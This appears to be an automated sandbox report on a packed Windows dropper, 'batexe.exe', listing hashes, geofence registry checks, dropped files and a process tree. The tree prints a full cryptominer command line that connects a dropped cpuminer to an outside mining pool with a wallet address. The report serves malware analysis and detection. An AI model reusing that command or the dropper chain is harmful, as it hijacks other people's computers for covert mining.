73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
300s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
18-02-2024 09:56

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4140	b2e.exe
1472	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
1472	cpuminer-sse2.exe
1472	cpuminer-sse2.exe
1472	cpuminer-sse2.exe
1472	cpuminer-sse2.exe
1472	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/1956-7-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 1956 wrote to memory of 4140	1956	batexe.exe	85
PID 1956 wrote to memory of 4140	1956	batexe.exe	85
PID 1956 wrote to memory of 4140	1956	batexe.exe	85
PID 4140 wrote to memory of 2800	4140	b2e.exe	86
PID 4140 wrote to memory of 2800	4140	b2e.exe	86
PID 4140 wrote to memory of 2800	4140	b2e.exe	86
PID 2800 wrote to memory of 1472	2800	cmd.exe	89
PID 2800 wrote to memory of 1472	2800	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:1956
- C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4140
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\6765.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2800
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1472

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe

Filesize
29.8MB

MD5
e4a2a462234cc0cb00b6654a8078d69b

SHA1
9fe7989899dd112df99bfcd9876b90b8d792b52f

SHA256
9601646240cca8207a63777731c5bf6b6cec19422ecd8c4b911dafc0cfa0c942

SHA512
90d37263b25d8075dbfa6399d9589c1e721d7b8ce70d7b108634a5f5ffcec9c8c74e5806205220d2fd3faa2716ba46380ecaee5d0978eb3012996f1f4edaac43

Download Submit
C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe

Filesize
13.9MB

MD5
bdef89bdfa440272f79cdc0beabe18da

SHA1
09d174be9d0363d6e646c2a1ab2b752c54cda1c8

SHA256
02fbfcfd009ee85ec768e0afd95cf4fa1a4854d3ed08d3f7f4079b8bc63f7610

SHA512
4f0880d9de413ce91384fc7e1899650710c1299eb1f7f56f4e59b4e2c86d57063d949ff78be85a1dda6cdc9faea532d19dc8477f4b20ce06202dbb5f42ccc90c

Download Submit
C:\Users\Admin\AppData\Local\Temp\63BB.tmp\b2e.exe

Filesize
14.4MB

MD5
bae72a0740b97f1f296f48fe0613c5dc

SHA1
48f0bae3b476e42b54e3833e42528f2a400d05d9

SHA256
6e1b8a710a5f3362a1e35f53dc2bb115f6734feba14f66cb50cf75992e785c14

SHA512
6eb315d3c784d502d632c7b8ae9b9adc39ef9a7a7182a49144392674fec33ecebacb814af47f6ebf4479d85acdb725cc49125d08c8ee90dbc58e645d86251e15

Download Submit
C:\Users\Admin\AppData\Local\Temp\6765.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1024KB

MD5
1ad6167569badab73bb51c7109b56693

SHA1
85c80eff3810728aeb4af1cdfc6984facaeeb6c0

SHA256
2a0237405f10841de2c9a5d337e1ae7ef626e562194dc6d096d92ae81e88aea6

SHA512
e219d97f0dc3b5f94798dc75f5328b4e7282c420fbb4ed1b44fb1e17941486f244fa28ccd73f55fcaa299a9b2526395a6a81d20a7ff26d9fe02bad77fec68648

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
1.2MB

MD5
6b2904323dbbac93d45bb06800959228

SHA1
aa799855cfed81183deb5797f3c7c1878ec95300

SHA256
0043146e75f4d928d11850e424153a34130e3b8a0fe4d443a4a7905d04d986b5

SHA512
514d00b03ab44c8fe05e53e1ad659087580770546fd86c6d75eb7886e1c2149d19f465e1b89a69a3e67ea002a424f46ff049362b2eaa550f612eabac147d5b8a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
178KB

MD5
05b50c84dd79bf5aa4b1b5915ce66434

SHA1
aa9171b1203bf715f6d804ce809aef291bd77dd7

SHA256
213b37fdfd47445934862c3241c507f2d4ab6bd77b98edd053a9992190763fd2

SHA512
bc36078bd70d32e109d71b56c221d253d3f2c27a6216eb1f3f7d3fa1b96fd3edc22697bb9618531d255fca94a30c87e0536fd51d78ff7154034e545e1d7c7d9e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
836KB

MD5
aeab40ed9a8e627ea7cefc1f5cf9bf7a

SHA1
5e2e8ca2881b9bf9edfa3c4fdcec6da1efa102d8

SHA256
218cfc4073bab4eddf0de0804f96b204687311e20a9e97994bff54c9b0e01ee9

SHA512
c0a67616fa01fdc351015212a718faf70da6612fbb3ec13da28dd7af9a507c56882fb7c3eea6fbc37d4d63b970157199d16d0756dbe3cb3bc2223e215cb104d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
1.1MB

MD5
dded38b0efb4fd7b528cb316f8838dab

SHA1
1aadbb42fca4d756896e36e29e28d4e8f2fa7019

SHA256
d4c0c25631bc55835bee0b0282e36d4bef297ddcf8eac786ff7071bbf002a24b

SHA512
c6700837e135261e2fead07d0405184203d05a48c0bdc2ddd13fb5ef47b7b07c440462c53f22e4063b3a5e36b9fbac920be21240bc4458b10b1809faae95c54a

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
767KB

MD5
bc3ea842e122f0983a372431123ea1bf

SHA1
1036e57d6f0755fc26c52f61419cb2b6eecca967

SHA256
bb57d88a73cff657642f833375fdd5aaa4242d01d4f5e09781effd791122a6dd

SHA512
84a5fbcd6b2dcdee64ce1c49c05a6bb95652c948fc4fb52d033d296bf26297e18e9ec18a8327278f7b07b75e617e803a84743bec821279b8facc106e2de6fdb3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
846KB

MD5
397768bb51a2c9dd51660a65cd048393

SHA1
c0e41c27a16926810add2f3372451ce2cbef68bb

SHA256
3f85d3f8412acaa9fe9e477bd0e4f544ad42eb5bcb3badc1a2b5786d0da2da4f

SHA512
e7075f62f7ee1eb10cf7cd5d1ec666b0e720335f77683922907a36e4020eccfdc6027ad9ddeb770f251f2537b1fd3946a6bb922374f02f650650954d7b710f92

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
915KB

MD5
a3b6c10ef59055c527943ab1ab731268

SHA1
1a911aab44224114ba4de72488f4cc476c553c8a

SHA256
a626284171cf66aab1352e5199532ef2bb898524b8e2fbb41453a15e18c14b03

SHA512
520b615b9e5f795ffb43466daf0d5ebdc7fe9c19b336c271779331a294c81c84fafa918f0c1311fdfabbcc24750c3a14a8a7d5e10d4846a31437c0fde2596821

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
939KB

MD5
f58b9884b3038ae4d8b191b7c4a3c7a8

SHA1
3ee63cd53ccfbad9d291e0c493eeace61d3fba5e

SHA256
d51679675f85f79d0872ade363bd13250e1dec9e397fb96870f82c723e1c78e6

SHA512
ef07ca245d1b4d39a0c5382c24d9bb264ef76f4cc60c4c74cf35d1985cafc3145154c8b8e65f3171a359ebf34f8875589de62e3f7066a148ba71ea720e54ee12

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
606KB

MD5
585efec1bc1d4d916a4402c9875dff75

SHA1
d209613666ccac9d0ddab29a3bc59aa00a0968fa

SHA256
2f9984c591a5654434c53e8b4d0c5c187f1fd0bab95247d5c9bc1c0bd60e6232

SHA512
b93163cba4601ed999a7a7d1887113792e846c36850c6d84f2d505727dc06524bb959469f9df12928769f4535dc6074a6b3599b788a4844353e466742ce1e770

Download Submit
memory/1472-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/1472-46-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/1472-45-0x0000000055450000-0x00000000554E8000-memory.dmp

Filesize
608KB

Download
memory/1472-47-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/1472-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-79-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1472-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/1956-7-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4140-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4140-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download